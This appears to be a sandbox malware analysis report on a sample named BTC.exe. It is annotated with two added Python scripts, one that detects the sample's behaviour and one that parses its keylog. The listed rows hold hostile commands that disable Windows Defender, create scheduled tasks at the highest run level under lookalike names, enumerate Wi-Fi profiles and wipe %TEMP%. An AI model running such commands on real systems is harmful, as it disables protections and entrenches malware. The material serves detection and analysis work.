Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k start /b del /q/f/s %TEMP%\* & exit
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender Service Host" /tr "C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout 3
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe "C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"
Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Windows Update" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe" /rl HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 4
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Dol1ysW8Xfj9.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K del /q/f/s C:\Users\user\AppData\Local\Temp\*
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Roaming\Window Security.exe "C:\Users\user\AppData\Roaming\Window Security.exe"
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\CMaYLAcPq0sZ.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Roaming\Window Security.exe "C:\Users\user\AppData\Roaming\Window Security.exe"
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Q83dEbLbhfIH.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
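The process-creation rows above are the ones a detection engineer would turn into rules: a binary running out of %APPDATA% under a Windows-sounding name spawns powershell.exe with Set-MpPreference switches that turn Defender features off (the *ThreatDefaultAction value 6 is "Allow", MAPSReporting 0 disables cloud lookups, SubmitSamplesConsent 2 is "never send"), registers scheduled tasks at the highest run level that point back into %APPDATA%, enumerates saved Wi-Fi profiles and nearby BSSIDs through netsh, and wipes %TEMP% with del /q/f/s. The script below is an added example written for this page, not code from the report or from the sample: it runs that rule logic over process-creation records of the kind Sysmon Event ID 1 or Security Event 4688 supply (parent image plus command line). The records are constructed from the rows above; the Event type, the rule names and the explorer.exe control record that runs Get-MpPreference are this example's own assumptions.

```python
"""Triage process-creation records for the Defender tampering, task persistence,
Wi-Fi recon and %TEMP% wiping seen in the BTC.exe report.
Added example for this page; not code from the report or from the malware."""
import re
from dataclasses import dataclass

# Set-MpPreference switches that turn a Defender feature off when set to $true.
DEFENDER_DISABLE_SWITCHES = {
    "disablerealtimemonitoring", "disableioavprotection", "disablescriptscanning",
    "disablearchivescanning", "disableblockatfirstseen", "disableprivacymode",
    "signaturedisableupdateonstartupwithoutengine",
}
# Switch values that weaken Defender: *ThreatDefaultAction 6 = Allow,
# MAPSReporting 0 = cloud protection off, SubmitSamplesConsent 2 = never send.
DEFENDER_WEAK_VALUES = {
    "lowthreatdefaultaction": {"6"}, "moderatethreatdefaultaction": {"6"},
    "highthreatdefaultaction": {"6"}, "severethreatdefaultaction": {"6"},
    "mapsreporting": {"0"}, "submitsamplesconsent": {"2"},
}
# "-Name value" pairs; a leading whitespace is required so "Set-MpPreference" is not a switch.
PARAM_RE = re.compile(r"(?:^|\s)-(\w+)(?:\s+(?!-)(\S+))?")
USER_WRITABLE = re.compile(r"\\(AppData\\(Roaming|Local)|Users\\[^\\]+\\Desktop|Temp)\\", re.I)
# Names the sample uses to pass as Windows components (see the dropped files above).
LOOKALIKE = re.compile(r"windows? (security|defender|update)|svchost|security health", re.I)
LOLBIN = re.compile(r'(^|\\|")(powershell|cmd|schtasks|netsh)(\.exe)?(\s|"|$)', re.I)
TASK_TARGET = re.compile(r"/tr\s+(.*?)(?=\s+/\w+|\s+&|\s*$)", re.I)
TASK_NAME = re.compile(r'/tn\s+"([^"]+)"', re.I)
TEMP_WIPE = re.compile(r"\bdel\b.*/[qfs].*(%temp%|\\temp)\\\*", re.I)
WIFI = re.compile(r"netsh\s+wlan\s+show\s+(profile|networks)", re.I)


@dataclass
class Event:
    parent: str    # image path of the creating process
    cmdline: str   # command line of the created process


def classify(ev: Event) -> list[str]:
    """Rule names that match one process-creation record (empty list = clean)."""
    hits = []
    cl = ev.cmdline
    parent_name = ev.parent.rsplit("\\", 1)[-1]
    if USER_WRITABLE.search(ev.parent) and LOOKALIKE.search(parent_name):
        hits.append("masquerade:parent_lookalike_in_user_writable_path")
    if USER_WRITABLE.search(ev.parent) and LOLBIN.search(cl):
        hits.append("lolbin:launched_from_user_writable_parent")
    if "set-mppreference" in cl.lower():
        for name, value in PARAM_RE.findall(cl):
            n, v = name.lower(), value.lower().lstrip("$")
            if (n in DEFENDER_DISABLE_SWITCHES and v in ("true", "1")) \
                    or v in DEFENDER_WEAK_VALUES.get(n, ()):
                hits.append("defender_tamper:" + name)
    if "schtasks" in cl.lower() and "/create" in cl.lower():
        m = TASK_TARGET.search(cl)
        target = m.group(1).strip("'\" ") if m else ""
        if USER_WRITABLE.search(target):
            hits.append("persistence:task_target_in_user_writable_path")
        if re.search(r"/rl\s+highest", cl, re.I):
            hits.append("persistence:task_highest_runlevel")
        tn = TASK_NAME.search(cl)
        if LOOKALIKE.search((tn.group(1) if tn else "") + " " + target.rsplit("\\", 1)[-1]):
            hits.append("masquerade:task_or_target_lookalike_name")
    if WIFI.search(cl):
        hits.append("recon:wifi_profile_or_bssid_enumeration")
    if TEMP_WIPE.search(cl):
        hits.append("antiforensics:temp_directory_wipe")
    return hits


def scan(events: list[Event]) -> list[tuple[str, list[str]]]:
    """(cmdline, rule hits) for every record that matched at least one rule."""
    return [(ev.cmdline, hits) for ev in events if (hits := classify(ev))]


# Constructed records: parent/command line pairs taken from the report rows above,
# plus one benign control record (explorer.exe running Get-MpPreference) for contrast.
WS = r"C:\Users\user\AppData\Roaming\Window Security.exe"
PS = r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
SAMPLE_EVENTS = [
    Event(WS, PS + "Set-MpPreference -DisableRealtimeMonitoring $true"),
    Event(WS, PS + "Set-MpPreference -HighThreatDefaultAction 6 -Force"),
    Event(WS, PS + "Set-MpPreference -MAPSReporting 0"),
    Event(WS, r'"schtasks" /create /tn "Windows Update" /sc ONLOGON /tr "' + WS + r'" /rl HIGHEST /f'),
    Event(r"C:\Windows\System32\cmd.exe",
          r"schtasks /create /f /sc onlogon /rl highest /tn "
          r'"Windows Security Health Service" /tr '
          r"'\"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe\"'"),
    Event(r"C:\Users\user\AppData\Roaming\svchost.exe",
          r'"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All'),
    Event(WS, r'"C:\Windows\System32\cmd.exe" /k start /b del /q/f/s %TEMP%\* & exit'),
    Event(r"C:\Windows\explorer.exe", PS + "Get-MpPreference -verbose"),  # benign control
]

if __name__ == "__main__":
    for cmdline, hits in scan(SAMPLE_EVENTS):
        print(cmdline[:72], "->", ", ".join(hits))
```

The Defender rule keys on switch names and values rather than on "Set-MpPreference" alone, so an administrator reading settings with Get-MpPreference, or setting a harmless exclusion, does not fire it; the schtasks rule is strongest when all three of its parts match, which is exactly the combination the sample shows (highest run level, target under %APPDATA%, task name imitating a Windows component).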
Source: Windows Security.exe, 00000010.00000002.4466012118.0000000002628000.00000004.00000800.00020000.00000000.sdmp, Windows Security.exe, 00000010.00000002.4466012118.0000000002631000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: <meta http-equiv='Content-Type' content='text/html; charset=utf-8' />Log created on 03.09.2024 00:16<br><br><style>.h { color: 0000ff; display: inline; }</style><p class="h"><br><br>[<b>Program Manager - 00:17</b>]</p><br><p class="h">[Win + R]</p><p class="h">[Win + R]</p>
Source: Windows Security.exe, 00000010.00000002.4466012118.0000000002598000.00000004.00000800.00020000.00000000.sdmp, Windows Security.exe, 00000010.00000002.4466012118.0000000002631000.00000004.00000800.00020000.00000000.sdmp, Windows Security.exe, 00000010.00000002.4466012118.0000000002622000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: Windows Security.exe, 00000010.00000002.4466012118.0000000002598000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Managert-]q
Source: Windows Security.exe, 00000010.00000002.4466012118.0000000002631000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: <meta http-equiv='Content-Type' content='text/html; charset=utf-8' />Log created on 03.09.2024 00:16<br><br><style>.h { color: 0000ff; display: inline; }</style><p class="h"><br><br>[<b>Program Manager - 00:17</b>]</p><br><p class="h">[Win + R]</p><p class="h">[Win + R]</p><p class="h">[Win + R]</p>@\]qTe]qtbc
Source: Windows Security.exe, 00000010.00000002.4466012118.0000000002628000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $]qq<p class="h"><br><br>[<b>Program Manager - 00:17</b>]</p><br><p class="h">[Win + R]</p><p class="h">[Win + R]</p>
Source: Windows Security.exe, 00000010.00000002.4466012118.0000000002628000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: `,]qa><br>[<b>Program Manager - 00:17</b>]</p><br><p class="h">[Win + R]</p><p class="h">[Win + R]</p>
Source: Windows Security.exe, 00000010.00000002.4466012118.0000000002628000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: <meta http-equiv='Content-Type' content='text/html; charset=utf-8' />Log created on 03.09.2024 00:16<br><br><style>.h { color: 0000ff; display: inline; }</style><p class="h"><br><br>[<b>Program Manager - 00:17</b>]</p><br><p class="h">[Win + R]</p><p class="h">[Win + R]</p>@\]qTe]ql
Source: Windows Security.exe, 00000010.00000002.4466012118.0000000002628000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $]qq<p class="h"><br><br>[<b>Program Manager - 00:17</b>]</p><br><p class="h">[Win + R]</p><p class="h">[Win + R]</p>LR]q
Source: Windows Security.exe, 00000010.00000002.4466012118.0000000002631000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: <meta http-equiv='Content-Type' content='text/html; charset=utf-8' />Log created on 03.09.2024 00:16<br><br><style>.h { color: 0000ff; display: inline; }</style><p class="h"><br><br>[<b>Program Manager - 00:17</b>]</p><br><p class="h">[Win + R]</p><p class="h">[Win + R]</p><p class="h">[Win + R]</p>
Source: Windows Security.exe, 00000010.00000002.4466012118.0000000002631000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: <meta http-equiv='Content-Type' content='text/html; charset=utf-8' />Log created on 03.09.2024 00:16<br><br><style>.h { color: 0000ff; display: inline; }</style><p class="h"><br><br>[<b>Program Manager - 00:17</b>]</p><br><p class="h">[Win + R]</p><p class="h">[Win + R]</p>@\]q@
Source: Windows Security.exe, 00000010.00000002.4466012118.0000000002598000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $]q=<p class="h"><br><br>[<b>Program Manager - 00:17</b>]</p><br>LR]q
Source: Windows Security.exe, 00000010.00000002.4466012118.0000000002598000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: `,]q-><br>[<b>Program Manager - 00:17</b>]</p><br>
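The memory strings above are the keylogger's HTML log as it sits in the heap of Windows Security.exe: a "Log created on" header, a window title with a timestamp inside [<b>...</b>], then one <p class="h"> element per key event, with unrelated heap bytes (the "@\]qTe]qtbc" tails) following the last </p>. An analyst carving this out of a memory image wants it as a per-window timeline rather than as HTML. The parser below is an added example written for this page, not code from the report or from the sample. Its input is constructed: the first window is the fragment seen above; the second window (Notepad with typed text) is invented for the example to show how typed text and bracketed special keys are split, and the stray trailing bytes are included to show they are ignored.

```python
"""Reconstruct a per-window timeline from the HTML keylog format seen in the
Windows Security.exe memory strings. Added example for this page; not code
from the report or from the sample."""
import re
from dataclasses import dataclass, field
from typing import Optional

HEADER_RE = re.compile(r"Log created on (\d{2}\.\d{2}\.\d{4} \d{2}:\d{2})")
PARA_RE = re.compile(r'<p class="h">(.*?)</p>', re.S)
WINDOW_RE = re.compile(r"\[<b>(.+?) - (\d{2}:\d{2})</b>\]")   # "[<b>Title - HH:MM</b>]"
TAG_RE = re.compile(r"<[^>]+>")
# A key event is either a bracketed special key ("[Win + R]", "[Enter]") or a run of typed text.
TOKEN_RE = re.compile(r"\[[^\]]+\]|[^\[]+")


@dataclass
class WindowLog:
    title: str
    time: str
    keys: list[str] = field(default_factory=list)


def parse_keylog(html: str) -> tuple[Optional[str], list[WindowLog]]:
    """Return (log creation timestamp, windows in order of appearance).

    Only <p class="h"> bodies are interpreted, so heap bytes before the header
    or after the last </p> are ignored rather than mistaken for keystrokes."""
    created = HEADER_RE.search(html)
    windows: list[WindowLog] = []
    for body in PARA_RE.findall(html):
        w = WINDOW_RE.search(body)
        if w:                                   # a new foreground window was recorded
            windows.append(WindowLog(w.group(1), w.group(2)))
            continue
        text = TAG_RE.sub("", body).strip()
        if not text:
            continue
        if not windows:                         # keys logged before any window header
            windows.append(WindowLog("<unknown window>", ""))
        windows[-1].keys.extend(TOKEN_RE.findall(text))
    return (created.group(1) if created else None), windows


def timeline(windows: list[WindowLog]) -> list[str]:
    """One line per window: 'HH:MM Title: keys', in log order."""
    return [f"{w.time} {w.title}: {''.join(w.keys)}" for w in windows]


# Constructed input. The first window is the fragment dumped from memory in the report;
# the second window and the trailing heap bytes are made up for this example.
SAMPLE_FRAGMENT = (
    "<meta http-equiv='Content-Type' content='text/html; charset=utf-8' />"
    "Log created on 03.09.2024 00:16<br><br>"
    "<style>.h { color: 0000ff; display: inline; }</style>"
    '<p class="h"><br><br>[<b>Program Manager - 00:17</b>]</p><br>'
    '<p class="h">[Win + R]</p><p class="h">[Win + R]</p><p class="h">[Win + R]</p>'
    '<p class="h"><br><br>[<b>Untitled - Notepad - 00:19</b>]</p><br>'   # constructed
    '<p class="h">passw0rd[Enter]</p>'                                    # constructed
    "@\\]qTe]qtbc"                                                        # stray heap bytes
)

if __name__ == "__main__":
    created_at, logs = parse_keylog(SAMPLE_FRAGMENT)
    print("log created:", created_at)
    for line in timeline(logs):
        print(line)
```

Because the window regex anchors on the " - HH:MM</b>]" suffix, titles that themselves contain " - " (as "Untitled - Notepad" does) are kept whole; when carving a real dump, run the parser over each distinct copy of the fragment, since the strings above show the same log at several heap addresses in different stages of being written.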

Language, Device and Operating System Detection

Source: Yara match | File source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
Source: C:\Users\user\Desktop\BTC.exe | Queries volume information: C:\Users\user\Desktop\BTC.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\crack.exe | Queries volume information: C:\Users\user\AppData\Roaming\crack.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Cracked.exe | Queries volume information: C:\Users\user\AppData\Roaming\Cracked.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe | Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\update.exe | Queries volume information: C:\Users\user\AppData\Roaming\update.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Queries volume information: C:\Users\user\AppData\Roaming\Window Security.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe | Queries volume information: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe | Queries volume information: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
